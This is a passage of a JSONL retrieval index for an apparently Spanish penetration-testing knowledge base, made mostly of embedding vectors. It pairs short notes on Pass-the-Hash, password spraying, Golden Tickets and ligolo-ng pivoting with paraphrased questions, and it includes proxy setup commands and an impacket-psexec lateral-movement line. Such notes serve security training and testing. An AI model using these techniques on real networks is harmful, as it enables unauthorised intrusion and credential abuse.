-0.02753, -0.18534, 0.00288, 0.101, 0.02552, 0.00974, 0.00813, 0.01639, -0.03714, -0.02037, -0.02406, -0.15725, -0.13058, -0.11439, -0.03573, 0.08536, -0.01174, -0.03654, -0.03288, -0.11239, -0.00012, 0.11004, 0.10305, -0.06371, -0.06158, 0.04931, -0.02998, -0.08019, 0.03952, 0.03381, -0.04476, -0.03704, 0.03467, 0.04807, -0.00983, -0.01655, 0.02696, 0.00125, 0.07396, -0.04369, -0.04471, 0.02392, -0.05105, -0.06805, -0.02506, -0.04281, -0.06343, -0.02871, -0.03207, 0.08648, -0.02006, -0.02646, 0.00083, -0.06533, -0.02218, -0.0424, -0.02438, -0.04978, -0.00701, -0.00017, -0.10214, -0.03081, 0.16421, -0.00173, -0.03943, 0.02462, -0.0328, 0.03165, -0.14595, 0.01218, -0.01077, -0.08787, -0.11894, 0.10128, 0.02591, -0.09773, -0.05074, 0.03368, 0.01896, -0.06727, -0.07335, 0.01156, 0.09235, -0.02341, 0.02648, -0.04391, -0.07667, -0.15794, -0.05109, 0.01461, 0.01864, -0.02799, 0.0231, 0.05173, 0.09655, 0.01594, -0.12257, -0.12791, 0.07204, 0.04414, 0.06273, 0.00607, 0.0077, 0.01672, 0.03698, 0.00117, -0.09708, -0.06854, -0.04554, 0.03246, 0.04265, 0.02932, 0.06751, -0.03608, -0.04005, 0.00015, -0.08309, -0.02604, 0.13416, -0.03406, 0.00439, 0.00319, 0.08521, -0.09677, -0.02363, 0.02413, -0.0641, 0.03931, 0.08967, 0.03735, 0.03588, 0.02602, -0.00735, 0.03073, -0.03202, -0.02577, -0.08392, 0.04591, -0.07921, 0.04657, -0.04426, -0.0769, -0.01133, 0.05077, -0.01887, 0.10189, 0.05308, 0.02119, 0.01682, -0.02492, -0.0039, 0.0405, 0.03522, 0.05558, -0.0271, -0.00333, -0.02936, -0.06862, -0.01093, -0.02059, 0.0119, -0.03565, -0.08154, 0.10307, 0.04142, -0.07639, -0.0057, -0.0512, 0.08553, 0.03067, -0.01017, 0.02698, -0.06743, -0.11745, -0.00866, -0.00507, 0.00732, -0.02517, -0.05125, 0.09094, 0.00054, 0.02156, 0.04785, 0.01727, -0.04273, -0.0299, -0.04654, 0.02188, 0.06138, -0.02087, -0.01124, 0.00077, -0.03173, 0.05233, -0.02185, -0.04851, -0.00418, -0.0752, 0.00386, -0.0541, -0.01584, 0.023, -0.00985, -0.07819, -0.01134, -0.06027, 0.01238, -0.00125, -0.02796, -0.01092, 0.02876, 0.07056, 0.00577, 0.04121, -0.01437]} -{"tipo": "pregunta", "herramienta": "Pass-the-Hash", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pass-the-Hash.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Combos\n- **ReutilizaciΓ³n**: prueba el hash/usuario contra **todos** los hosts (MetodologΓ­a OSCP).\n- Password spraying: la misma pass de un user normal contra `administrator`, `sa`...\n- Hash de krbtgt β†’ ya no es PtH, es Golden Ticket.\n\nRelacionado: Impacket Β· Movimiento lateral Β· OSCP MOC", "indexar": "cual es una alternativa libre a Impacket para generar tickets golden?", "v": [-0.19344, -0.04924, -0.0858, 0.02027, -0.06364, -0.04335, -0.0517, -0.00012, -0.18637, -0.07688, -0.06042, -0.11356, -0.04755, 0.12523, 0.05226, 0.03209, 0.00644, -0.09674, 0.20763, -0.02759, -0.07194, 0.11174, 0.01675, -0.27401, -0.06263, -0.07228, 0.01045, 0.11504, -0.04459, -0.00397, 0.02255, -0.12328, -0.04842, -0.14699, -0.068, -0.10489, 0.12135, 0.18633, 0.06565, -0.08143, 0.01377, -0.01723, -0.08241, 0.0868, 0.05851, -0.08664, -0.0132, 0.12535, -0.09629, 0.00525, -0.08932, -0.01653, -0.00426, 0.03719, 0.0654, -0.06373, 0.00884, -0.16301, -0.12417, 0.072, -0.06141, 0.00397, -0.08324, -0.01933, -0.01868, 0.1367, -0.03961, -0.03261, 0.03844, -0.0103, -0.0111, -0.05394, 0.05012, 0.07376, -0.04711, 0.08369, 0.01737, -0.01065, -0.07553, 0.08502, 0.02772, -0.04472, 0.03574, 0.00975, 0.05933, -0.06659, 0.0852, -0.06531, -0.03299, 0.06685, 0.04973, 0.00615, 0.06422, 0.08352, -0.04283, -0.16474, -0.07457, 0.02842, -0.01362, 0.07687, 0.01571, 0.03083, -0.08011, -0.03245, 0.01409, 0.00719, 0.03615, -0.00344, -0.07657, -0.01728, -0.0261, 0.06492, -0.04367, 0.0439, 0.00768, -0.0365, 0.05954, 0.04562, 0.05818, 0.03998, 0.04929, 0.00075, -0.07771, -0.07503, 0.07381, 0.01294, 0.01204, 0.02065, 0.0075, 0.02674, 0.05038, 0.01008, -0.08277, -0.05961, -0.07147, -0.01625, 0.00776, -0.03402, 0.06404, 0.02642, 0.04506, -0.03337, -0.0045, -0.04458, 0.01088, -0.04644, -0.01057, -0.05859, -0.01013, -0.02432, -0.06079, -0.04064, -0.03267, 0.12426, -0.04586, 0.05912, -0.03612, -0.01748, -0.04972, 0.05887, 0.00626, -0.0078, 0.0151, 0.02539, -0.03043, 0.01068, -0.07805, -0.02522, -0.06799, -0.00342, -0.00938, 0.04999, 0.11654, -0.03611, 0.03897, -0.08304, -0.03745, -0.09546, 0.03415, -0.07474, 0.07418, -0.0127, -0.10775, 0.02654, -0.0315, -0.04581, 0.04267, -0.01318, 0.05609, 0.04393, -0.02763, 0.00062, -0.05393, -0.02094, -0.01363, -0.05688, 0.01496, -0.0781, -0.03905, -0.01903, -0.02933, -0.02177, 0.00535, -0.02089, 0.04726, -0.01604, -0.00034, 0.01074, 0.00672, 0.07674, 0.06089, -0.03485, 0.09497, 0.01801, -0.07241, -0.02018, 0.01508, -0.05242, -0.03453, -0.01232, 0.09347, 0.00054, 0.01923, -0.001, 0.02565, -0.00706, 0.01555, 0.04348, 0.02474, 0.02297, 0.04199, 0.03894, 0.00179, 0.04105, 0.04059, 0.01435, 0.03862, 0.0003, -0.02218, 0.01704, 0.0672, 0.06809, -0.02061, 0.00941, 0.00277, 0.03577, -0.07142, 0.01427, 0.00745, -0.045, -0.01938, 0.04108, -0.02082, 0.02837, 0.02759, -0.03587]} -{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Pivoting (ligolo-ng)\n\n> Entrar en una **red interna** no enrutable desde Kali, a travΓ©s de una mΓ‘quina comprometida. En `tu carpeta`.", "indexar": "que programa hay para entrar en redes internas no enrutables desde una mΓ‘quina comprometida?", "v": [-0.04845, 0.00933, -0.07138, -0.10012, 0.02699, -0.02958, -0.15666, 0.02452, -0.06338, -0.12419, -0.07916, -0.08322, 0.04262, -0.03625, 0.01295, 0.07369, -0.11069, 0.04564, 0.15127, -0.04981, -0.06347, -0.02165, -0.01246, -0.02587, -0.08003, 0.08728, 0.02225, 0.05889, -0.16889, -0.03435, -0.06725, -0.10527, 0.07328, -0.09263, 0.02588, -0.1078, 0.04154, 0.12138, 0.05374, -0.0026, 0.08491, 0.04819, -0.10464, 0.05464, 0.25318, 0.0356, 0.02791, -0.11587, -0.03256, -0.00616, -0.12098, -0.01614, -0.03426, 0.03057, -0.00559, -0.19463, 0.00642, -0.03211, -0.09216, -0.02992, -0.02975, 0.00678, -0.04751, -0.00228, 0.06265, 0.0067, 0.0609, 0.10139, -0.01071, 0.06423, 0.01994, 0.00872, -0.04807, -0.09135, 0.08008, 0.10087, -0.06541, 0.02778, 0.03121, 0.06579, -0.07254, -0.01621, 0.01015, 0.07761, -0.02645, -0.03038, 0.15172, 0.02313, 0.03498, -0.03838, 0.00239, 0.03371, -0.04894, 0.08282, 0.0483, 0.0171, 0.04411, -0.00282, 0.02138, -0.05935, 0.02185, -0.01196, 0.0031, 0.11911, -0.12958, 0.10185, 0.06807, -0.00496, 0.04826, -0.00509, 0.0679, 0.05568, -0.06993, -0.08473, -0.05072, 0.06731, -0.01432, 0.02766, -0.01658, -0.00927, -0.14086, 0.0289, -0.02934, -0.0834, 0.05621, 0.02501, -0.05034, 0.10038, 0.00027, -0.02134, 0.00172, 0.03238, -0.02368, -0.01575, -0.05821, -0.11412, -0.02546, -0.12443, -0.03793, -0.11417, -0.03294, 0.03592, -0.0146, -0.03017, 0.00232, 0.08327, 0.00147, -0.14343, -0.05872, 0.09408, 0.023, 0.04001, -0.0027, 0.06248, -0.07273, 0.09229, -0.07829, -0.06519, -0.07369, 0.03636, -0.05612, -0.01064, -0.04144, -0.06114, 0.0079, 0.03339, -0.08085, 0.06451, 0.04105, 0.03295, -0.08861, 0.12476, 0.02874, -0.01823, -0.02168, 0.04482, -0.00718, -0.03364, 0.03433, 0.00537, -0.10548, 0.03406, 0.06673, -0.05831, -0.01517, -0.01371, -0.0109, 0.02918, 0.0201, -0.01622, -0.04242, -0.00897, -0.01929, 0.06119, 0.062, -0.0423, -0.02428, 0.06673, 0.0433, -0.04197, -0.10031, 0.00744, -0.04656, 0.02841, -0.01405, 0.05937, -0.011, -0.10238, 0.03464, 0.1035, 0.01769, -0.02122, -0.02342, 0.01434, -0.05308, 0.01884, 0.04075, 0.05985, 0.02458, 0.07653, 0.07252, -0.03763, 0.031, 0.06463, -0.00542, -0.06124, -0.03909, 0.00637, 0.01615, -0.01263, 0.01086, -0.11535, -0.02646, -0.0632, -0.01537, -0.01235, -0.02943, -0.01142, -0.00976, -0.08316, -0.07133, 0.05568, 0.02458, -0.00658, -0.02029, -0.00568, -0.06578, 0.01237, -0.02372, -0.02597, -0.04766, 0.0355, 0.00884, -0.03207, 0.04828, 0.01249]} -{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Pivoting (ligolo-ng)\n\n> Entrar en una **red interna** no enrutable desde Kali, a travΓ©s de una mΓ‘quina comprometida. En `tu carpeta`.", "indexar": "cual es la tecnica o herramienta para pivotear trΓ‘fico desde un host ya controlado?", "v": [-0.01076, -0.01239, -0.16488, -0.23096, 0.12006, -0.10278, -0.00939, 0.01659, 0.07437, -0.03396, -0.02895, -0.03731, 0.08604, 0.07541, 0.11006, -0.04825, 0.11242, -0.15999, 0.08312, -0.05152, -0.12579, 0.04061, -0.04734, -0.03675, 0.0346, -0.05321, -0.00537, 0.01874, -0.3015, 0.0293, 0.01624, 0.03368, 0.13546, -0.01378, 0.01679, -0.08037, 0.05732, 0.05689, 0.12289, 0.0439, -0.13126, -0.07896, -0.01792, -0.00383, 0.10596, -0.04074, -0.04634, -0.04305, -0.02933, -0.02699, -0.01747, -0.07743, -0.06838, -0.06051, -0.00469, -0.11379, 0.14658, -0.11684, 0.04484, -0.13123, -0.00563, -0.01177, 0.00409, -0.04642, -0.06979, -0.06535, -0.00366, -0.08736, -0.12678, -0.00344, 0.00614, 0.08762, 0.06727, 0.12565, 0.04162, -0.04748, -0.00391, 0.16797, 0.07794, -0.06089, 0.09329, 0.02209, -0.12568, 0.03259, -0.0175, -0.08968, 0.02624, -0.03388, -0.02204, 0.01354, -0.03064, -0.01605, 0.0372, -0.00462, 0.0635, -0.01018, -0.03515, 0.02189, 0.03527, -0.07278, 0.17771, 0.05367, -0.14275, 0.0649, 0.04693, 0.08898, 0.01693, -0.08361, -0.06429, 0.04294, -0.02471, 0.11353, -0.00257, 0.03294, -0.01311, 0.02086, -0.04174, -0.06701, -0.05259, -0.08948, 0.04404, -0.02039, -0.00604, -0.0028, 0.05138, 0.03754, -0.01463, 0.12177, 0.1009, -0.04738, 0.06228, -0.05549, -0.03922, -0.00598, -0.07202, -0.02009, 0.03044, -0.07886, -0.02184, 0.06858, -0.01634, 0.06551, 0.06192, -0.05164, 0.0706, -0.07273, 0.00677, -0.07952, -0.05343, -0.00362, 0.031, -0.03872, 0.03606, 0.05483, 0.00698, 0.0072, -0.04132, -0.03149, -0.05222, 0.05644, -0.02388, -0.00705, 0.02806, -0.01039, 0.0256, 0.02406, -0.01969, 0.01745, 0.03747, 0.00593, 0.00123, 0.01996, 0.02852, 0.02124, -0.0404, -0.08259, -0.07689, -0.01463, -0.05496, -0.09572, -0.03519, -0.03185, -0.02785, -0.0006, 0.06056, 0.02653, 0.04113, 0.03979, 0.04215, -0.03431, -0.03019, 0.02867, -0.01308, -0.09284, -0.00839, -0.02441, -0.04443, -0.04886, 0.05487, -0.0141, 0.01887, -0.02619, 0.03917, -0.0454, -0.02551, 0.00509, -0.00903, -0.05012, 0.03838, 0.00464, 0.04076, -0.03461, 0.02604, 0.02415, 0.02789, -0.00617, -0.04575, -0.05624, 0.02537, 0.01688, 0.06801, -0.00721, 0.0171, -0.02221, -0.06193, -0.0116, 0.01365, 0.05664, 0.04594, 0.00282, -0.00596, 0.00997, 0.01315, 0.00818, 0.04546, -0.0242, 0.02804, -0.03314, -0.04859, -0.03998, 0.03502, 0.00729, -0.00815, -0.07846, -0.04649, -0.03077, -0.06248, -0.03411, -0.01187, -0.05303, 0.0011, 0.01832, 0.05545, -0.07706, 0.03663, -0.01892]} -{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## El concepto\n```\nKALI 10.10.10.5 ── tΓΊnel ──> USER1 10.10.10.50 ── llega a ──> 192.168.5.0/24 (DC interno)\n```\n- **proxy** corre en Kali, **agent** en la vΓ­ctima.\n- AΓ±ades una ruta y las tools tiran por el tΓΊnel **transparentemente**.", "indexar": "con quΓ© puedo crear un tΓΊnel proxy transparente para acceder a redes internas desde mi mΓ‘quina de pruebas?", "v": [0.03245, 0.00048, -0.21234, -0.1602, 0.06215, 0.05233, -0.10996, 0.06734, -0.01487, -0.08388, -0.07537, 0.05418, 0.05233, -0.03314, -0.06244, 0.05364, 0.00395, -0.0328, 0.1941, -0.01691, -0.08043, -0.1178, -0.14745, -0.10832, 0.04624, 0.01596, 0.01396, -0.07667, -0.11165, -0.2039, -0.07265, 0.00755, 0.14512, 0.0356, -0.04511, -0.03511, 0.00184, 0.20606, 0.03842, 0.04595, 0.05902, -0.05812, -0.09806, 0.10382, 0.13533, -0.01841, 0.01192, -0.09562, -0.03747, -0.04786, -0.07647, -0.15106, -0.21591, 0.0285, -0.01623, -0.07968, 0.04134, -0.10291, 0.00823, -0.05433, 0.02749, -0.08289, 0.02172, 0.07798, -0.01408, -0.0907, 0.01513, 0.04788, -0.11516, 0.03375, -0.01287, -0.01514, 0.00712, -0.04776, -0.03204, 0.06027, -0.05974, 0.00475, 0.03752, 0.10681, -0.01347, 0.06381, -0.02974, -0.05061, -0.04288, -0.0021, -0.07462, -0.02447, 0.0781, -0.04887, -0.05093, 0.02498, 0.02216, 0.0844, 0.10416, 0.03136, -0.01219, -0.05628, -0.02924, -0.09529, 0.01399, -0.02297, -0.04597, 0.15296, -0.03114, 0.06024, -0.02326, -0.06424, -0.00254, -0.08252, 0.09091, 0.09153, -0.07446, -0.09409, 0.00324, 0.02284, -0.0334, 0.07412, -0.06242, 0.00762, -0.01046, -0.03949, -0.08569, -0.0385, -0.02564, -0.06105, -0.00378, 0.04802, -0.01312, 0.05759, 0.01586, 0.0951, -0.04871, -0.06589, 0.02223, 0.00552, -0.04743, -0.10149, -0.00336, -0.05247, -0.00243, -0.02039, -0.04761, -0.07566, 0.00713, 0.04479, -0.0492, -0.14201, -0.01031, 0.01287, -0.04796, -0.0347, -0.03949, 0.03052, -0.05758, 0.00879, -0.04699, -0.05924, -0.04141, 0.04889, -0.02368, 0.02965, -0.08645, -0.00629, -0.01319, 0.03322, -0.09203, -0.03979, 0.02767, -0.01126, -0.08165, 0.063, -0.03457, -0.05435, 0.04983, 0.01583, -0.03401, -0.07522, 0.00575, -0.03855, 0.02173, -0.08454, -0.03388, 7e-05, -0.0021, -0.08048, 0.06959, -0.01436, 0.06274, 0.06641, -0.02082, 0.00145, -0.00883, 0.0229, 0.07983, -0.03225, 0.00222, -0.04429, 0.0442, -0.07474, -0.07739, -0.03553, 0.01266, -0.0301, -0.05471, -0.01192, -0.02083, -0.07118, 0.00543, 0.05777, 0.10171, -0.02984, 0.00334, -0.06111, -0.02046, 0.09452, 0.0699, -0.02996, -0.04523, 0.01581, 0.04358, 0.00795, 0.01502, 0.02017, 0.00403, 0.03812, -0.02973, 0.00135, -0.01692, -0.00925, 0.04756, -0.0058, -0.04439, -0.01174, 0.00878, -0.01716, -0.02542, 0.01843, 0.0108, -0.03216, -0.01364, 0.04519, 0.02072, 0.01512, -0.03954, 0.0035, -0.02307, -0.00362, -0.05397, -0.06149, -0.04826, -0.00605, -0.00269, -0.03046, 0.04896, 0.01592]} -{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## El concepto\n```\nKALI 10.10.10.5 ── tΓΊnel ──> USER1 10.10.10.50 ── llega a ──> 192.168.5.0/24 (DC interno)\n```\n- **proxy** corre en Kali, **agent** en la vΓ­ctima.\n- AΓ±ades una ruta y las tools tiran por el tΓΊnel **transparentemente**.", "indexar": "existe alguna herramienta que me permita dirigir mis anΓ‘lisis sin necesidad de configurar manualmente las rutas del objetivo?", "v": [0.08504, 0.19951, -0.17147, -0.1876, 0.10282, -0.03488, -0.07418, -0.00153, -0.17992, -0.08028, -0.05264, -0.04185, 0.02539, -0.0927, 0.09306, 0.01643, 0.02976, -0.03273, -0.02764, -0.0583, -0.04295, -0.1434, 9e-05, 0.07834, -0.08728, -0.01964, 0.10619, -0.06283, -0.18174, -0.03158, 0.00797, 0.10699, 0.06227, -0.08705, -0.02829, -0.08765, -0.08292, 0.03498, -0.01656, 0.06299, -0.05604, 0.04845, -0.07362, 0.16328, 0.05572, -0.02752, 0.00602, -0.0258, -0.0279, 0.0511, 0.02475, -0.06383, -0.07682, 0.00377, 0.07914, -0.09746, 0.22442, -0.14684, 0.05357, -0.13573, -0.00131, 0.04083, 0.03313, 0.06113, 0.05972, 0.024, 0.00462, -0.14239, -0.09054, 0.06514, -0.02178, 0.02508, -0.0388, 0.03774, 0.06537, -0.02723, 0.00284, 0.10691, 0.11908, -0.02111, 0.08538, -0.05164, -0.12127, 0.01477, -0.08485, -0.12395, 0.12428, -0.02533, -0.04428, -0.07744, -0.04342, -0.04697, -0.01996, -0.03258, 0.02131, -0.00344, 0.03056, 0.05264, 0.03038, 0.01958, 0.07821, -0.06139, -0.06097, 0.09045, 0.02025, 0.07011, 0.05112, -0.05443, -0.01104, 0.0243, -0.00029, 0.02042, 0.01872, -0.02914, -0.01656, -0.02743, -0.02335, -0.0555, -0.02305, -0.1046, -0.07947, -0.01945, -0.04013, -0.02249, -0.03973, 0.00861, -0.09239, 0.14704, 0.07163, -0.03275, -0.02314, -0.03453, -0.02907, -0.02059, -0.05365, 0.02607, 0.00308, -0.03746, -0.04325, -0.08407, -0.03692, 0.02495, -0.02743, -0.09163, 0.07198, -0.00417, -0.06391, -0.11818, -0.04727, 0.00105, -0.04423, 0.0044, 0.03313, 0.06933, 0.05348, 0.07378, 0.02469, -0.05356, -0.04915, 0.06769, -0.01825, -0.07046, 0.00079, -0.01426, 0.04639, -0.06481, -0.03957, -0.03419, 0.11243, 0.00013, -0.02407, 0.00384, -0.00079, -0.00826, 0.05744, -0.06661, 0.01378, -0.0402, 0.04745, -0.02233, 0.00216, 0.00183, 0.01448, -0.01912, -0.03487, -0.05326, 0.01404, -0.01944, 0.03076, 0.01909, 0.05404, 0.03681, -0.02075, -0.06953, 0.05109, -0.01598, -0.02075, -0.01929, 0.01232, -0.00518, -0.02103, -0.02239, 0.00491, -0.04302, 0.0488, 0.07703, -0.06219, 0.02867, -0.00244, 0.03291, 0.05393, -0.05332, 0.06526, -0.04451, -0.00599, 0.00698, 0.04129, -0.02364, -0.03505, 0.0546, 0.03644, 0.01733, 0.12663, -0.03314, -0.02519, 0.03217, 0.023, 0.00086, 0.04519, 0.02403, -0.03301, 0.01684, -0.02491, -0.0146, 0.05711, -0.006, 0.04471, -0.04351, -0.03359, -0.00155, 0.034, 0.07138, 0.00312, -0.05767, -0.06201, -0.04001, -0.0671, 0.03613, 0.00921, -0.06909, -0.00377, 0.05842, 0.05813, -0.03143, 0.03715, -0.07111]} -{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## El concepto\n```\nKALI 10.10.10.5 ── tΓΊnel ──> USER1 10.10.10.50 ── llega a ──> 192.168.5.0/24 (DC interno)\n```\n- **proxy** corre en Kali, **agent** en la vΓ­ctima.\n- AΓ±ades una ruta y las tools tiran por el tΓΊnel **transparentemente**.", "indexar": "cΓ³mo funciona una arquitectura tipo agente para realizar pruebas de penetraciΓ³n en servidores corporativos remotos?", "v": [0.10979, 0.05529, -0.12771, -0.2374, 0.12404, -0.00748, 0.09882, 0.02471, -0.09603, -0.00425, -0.12793, -0.09073, 0.04114, 0.00799, 0.17732, -0.03013, 0.09089, -0.0706, -0.06178, 0.07183, 0.05945, -0.07438, 0.00523, 0.03393, -0.02281, 0.09479, 0.11231, 0.05207, -0.02689, -0.0285, 0.03702, -0.07706, 0.15587, -0.02215, 0.01017, -0.07468, -0.11914, 0.12933, 0.05849, 0.13001, 0.09731, -0.00816, -0.12831, -0.05585, 0.13301, 0.03663, -0.00666, -0.14157, 0.03166, 0.00728, -0.14701, -0.0498, -0.13484, -0.06269, -0.03113, -0.05528, 0.09864, -0.06388, 0.01619, -0.04167, 0.01394, 0.02136, -0.01972, -0.00533, 0.08521, -0.0714, 0.07968, -0.09617, -0.01911, -0.07935, -0.0431, -0.03492, -0.01543, 0.00741, -0.05681, 0.02587, -0.01929, -0.0906, -0.0092, 0.03699, 0.01604, 0.10819, -0.1287, 0.03396, -0.17092, -0.11392, 0.00294, -0.00773, 0.02185, -0.06827, 0.01455, 0.01886, 0.00915, 0.06738, -0.00987, -0.03761, 0.06796, -0.06005, 0.03591, 0.04911, 0.04148, -0.00678, -0.00159, 0.11959, -0.10057, 0.0346, -0.00051, -0.03601, 0.03953, -0.09681, 0.04476, -0.00487, -0.1082, -0.05529, -0.08359, -0.07519, -0.00797, -0.05703, 0.02388, -0.00552, -0.15503, 0.02107, 0.04617, 0.06592, -0.05639, -0.08202, 0.06621, -0.00093, -0.03112, 0.03819, 0.01873, 0.01973, -0.11451, 0.05011, -0.00852, 0.00859, 0.00485, -0.03273, -0.01447, -0.10113, 0.00737, -0.02155, 0.04696, -0.01794, 0.03536, 0.06489, 0.0674, -0.06698, -0.05431, 0.05188, -0.02475, -0.02263, -0.10993, 0.0419, -0.10445, 0.01453, -0.00428, -0.1063, -0.08728, 0.09905, -0.00172, 0.07371, -0.03271, 0.0566, 0.01225, -0.0345, 0.01091, -0.08875, 0.04981, 0.03958, -0.0516, -0.00025, -0.00045, -0.12629, -0.01389, 0.02086, -0.04173, -0.03893, 0.02577, -0.02995, -0.02157, 0.0388, -0.02831, -0.04457, 0.07544, -0.01375, -0.01537, -0.04246, 0.00802, 0.04356, 0.00822, 0.00374, -0.00065, 0.07095, 0.0204, -0.02604, -0.05282, -0.00274, -0.00399, -0.02442, -0.02336, -0.09953, 0.0376, -0.04135, 0.02281, 0.02816, -0.01254, 0.07156, 0.00607, 0.08503, -0.02689, -0.04109, 0.06306, -0.01995, -0.02241, 0.00511, 0.03442, -0.05116, -0.05973, 0.02858, 0.00202, -0.0245, 0.00048, 0.00847, -0.01534, 0.03718, -0.00741, 0.02224, 0.03788, -0.00622, 0.04503, 0.04284, 0.03246, -0.00222, 0.01052, -0.05037, -0.01664, -0.05437, -0.01924, -0.08334, -0.03554, 0.06033, -0.01496, 0.02135, -0.01571, -0.07992, -0.04139, -0.03921, -0.02958, -0.03649, -0.03416, 0.0247, 0.0428, 0.00699, 0.0333, -0.02589]} -{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "# Kali (proxy):\nsudo ip tuntap add user $USER mode tun ligolo && sudo ip link set ligolo up\n./proxy -selfcert", "indexar": "que programa puedo usar para crear un proxy SOCKS5 sin certificado?", "v": [-0.02266, 0.00501, -0.28849, -0.04323, 0.04554, -0.26197, 0.01566, -0.0455, -0.02414, -0.05546, -0.12702, 0.01234, -0.01855, -0.1985, -0.08103, -0.02497, 0.04594, -0.12781, 0.00531, 0.14678, 0.04691, -0.0409, -0.06187, -0.13335, 0.09536, 0.11643, 0.08472, -0.00665, -0.03899, -0.04902, 0.03878, 0.1033, 0.092, 0.00345, -0.00863, -0.03124, 0.00484, 0.05469, 0.08275, 0.13326, 0.04495, -0.0375, 0.00104, 0.09864, 0.06225, -0.03623, 0.09901, -0.07376, -0.01844, -0.00576, -0.04445, -0.11457, -0.17446, 0.05459, -0.00591, -0.08894, -0.01497, -0.12761, -0.0166, -0.02645, -0.0157, 0.01525, 0.07143, -0.07117, 0.05688, -0.02429, 0.07297, 0.05257, -0.11322, 0.02722, -0.03031, -0.00717, 0.06232, -0.06754, 0.00942, 0.0432, -0.04702, -0.12415, 0.0673, -0.01482, 0.01453, 0.01485, 0.04554, -0.05772, -0.12597, -0.01526, -0.04037, 0.00223, 0.081, -0.09956, -0.01217, 0.07351, 0.05627, -0.05507, 0.09523, -0.08592, 0.1226, -0.06659, -0.00617, -0.02584, 0.05946, -0.00842, -0.03386, 0.08993, -0.05095, 0.04554, 0.01959, -0.03554, -0.00531, 0.05008, 0.01165, 0.00607, -0.05624, -0.09323, 0.02643, 0.02593, -0.0291, -0.00192, 0.05072, -0.02197, 0.00723, 0.00069, -0.09264, -0.00038, 0.11774, 0.0402, -0.09382, 0.10161, -0.04517, 0.08175, -0.00489, -0.06717, -0.08281, -0.09384, -0.0752, -0.02619, 0.00043, -0.07673, -0.036, -0.06668, -0.00031, 0.00799, 0.01203, 0.05252, 0.00674, 0.03809, -0.07776, -0.0466, -0.01224, -0.01778, -0.02872, 0.04932, -0.05194, 0.04634, -0.09707, -0.02614, 0.04158, -0.07842, -0.01166, 0.07211, -0.04101, 0.00214, 0.00439, 0.02343, 0.08007, 0.00398, 0.01035, 0.01893, 0.036, 0.11833, 0.04793, 0.04128, 0.01908, -0.0751, 0.05842, -0.00674, 0.03917, -0.09783, -0.03071, -0.01191, -0.02978, 0.00375, 0.03508, -0.02972, 0.04016, -0.06539, 0.01002, -0.02663, 0.04472, 0.03209, -0.06072, 0.09869, 0.00984, 0.02299, -0.01734, -0.01648, 0.01625, -0.06441, -0.00049, -0.08713, -0.04926, -0.03284, -0.04428, -0.04113, 0.05851, 0.02887, -0.02444, 0.00826, 0.07131, 0.10086, 0.02636, -0.09804, 0.04694, 0.03854, -0.06876, 0.021, -0.02308, -0.00809, -0.03652, -0.00325, -0.02437, 0.02177, 0.04, 0.02072, 0.06703, -0.02658, -0.01355, 0.02159, 0.0386, 0.02887, 0.00835, -0.00582, -0.03003, -0.03529, 0.03511, 0.0587, 0.0348, -0.03267, -0.00629, 0.00902, -0.03833, 0.07572, -0.01325, -0.06556, -0.01125, 0.04959, -0.03343, -0.0139, -0.01803, -0.01719, -0.02061, 0.04188, 0.03399, -0.07452, 0.01829, 0.04504]} -{"tipo": "pregunta", "herramienta": "Pivoting ligolo-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/05 - Active Directory/Pivoting ligolo-ng.md", "tema": "active directory", "fuente": null, "licencia": null, "texto": "## Resultado\n```bash\nimpacket-psexec admin@192.168.5.10 # el trΓ‘fico va por el tΓΊnel, transparente\n```\nAhora Movimiento lateral y Active Directory funcionan contra la red interna.\n\nRelacionado: Puesto de mando Kali Β· OSCP MOC", "indexar": "que herramienta puedo usar para ejecutar comandos remotos desde un puerto remoto en mi red interna", "v": [0.15056, 0.02707, -0.17016, -0.16011, 0.09627, 0.01769, 0.06956, -0.01699, -0.09894, -0.089, -0.17571, -0.04369, 0.14475, -0.06054, 0.09955, 0.04115, 0.06522, 0.10904, -0.01771, -0.05683, 0.01978, -0.11199, -0.00465, 0.03152, 0.01511, 0.05213, 0.1395, 0.03437, -0.10009, -0.0516, 0.02425, 0.02536, 0.08066, -0.0481, -0.08657, -0.05822, -0.00104, 0.08825, -0.01995, 0.10095, 0.01364, 0.07545, -0.17429, -0.0461, 0.1083, -0.01668, 0.06373, -0.05152, 0.02256, 0.0131, -0.01953, -0.13018, -0.11607, -0.06208, -0.06115, -0.0686, 0.24795, -0.08516, -0.02855, -0.06054, -0.03541, -0.07332, 0.02564, 0.05895, 0.00236, -0.12372, -0.07235, -0.05946, -0.13666, 0.08019, -0.10937, 0.03009, -0.00854, 0.07019, 0.03587, -0.04193, -0.06951, -0.00758, 0.1124, -0.03529, -0.07625, -0.00024, -0.07377, -0.02143, -0.11875, -0.16948, 0.02594, -0.01904, 0.02946, -0.09906, 0.04779, -0.07594, -0.00398, -0.00832, 0.04936, 0.0492, -0.00499, 0.0045, -0.01421, -0.0407, 0.03731, 0.02858, -0.03786, 0.05908, 0.01815, 0.02458, 0.01539, -0.04389, 0.05511, -0.00209, 0.0683, -0.03968, 0.01923, -0.09241, -0.05195, -0.04224, -0.04388, -0.09128, 0.03345, -0.04535, -0.06298, -0.00258, -0.03263, -0.01183, 0.01863, -0.05596, -0.0701, 0.06024, 0.0211, 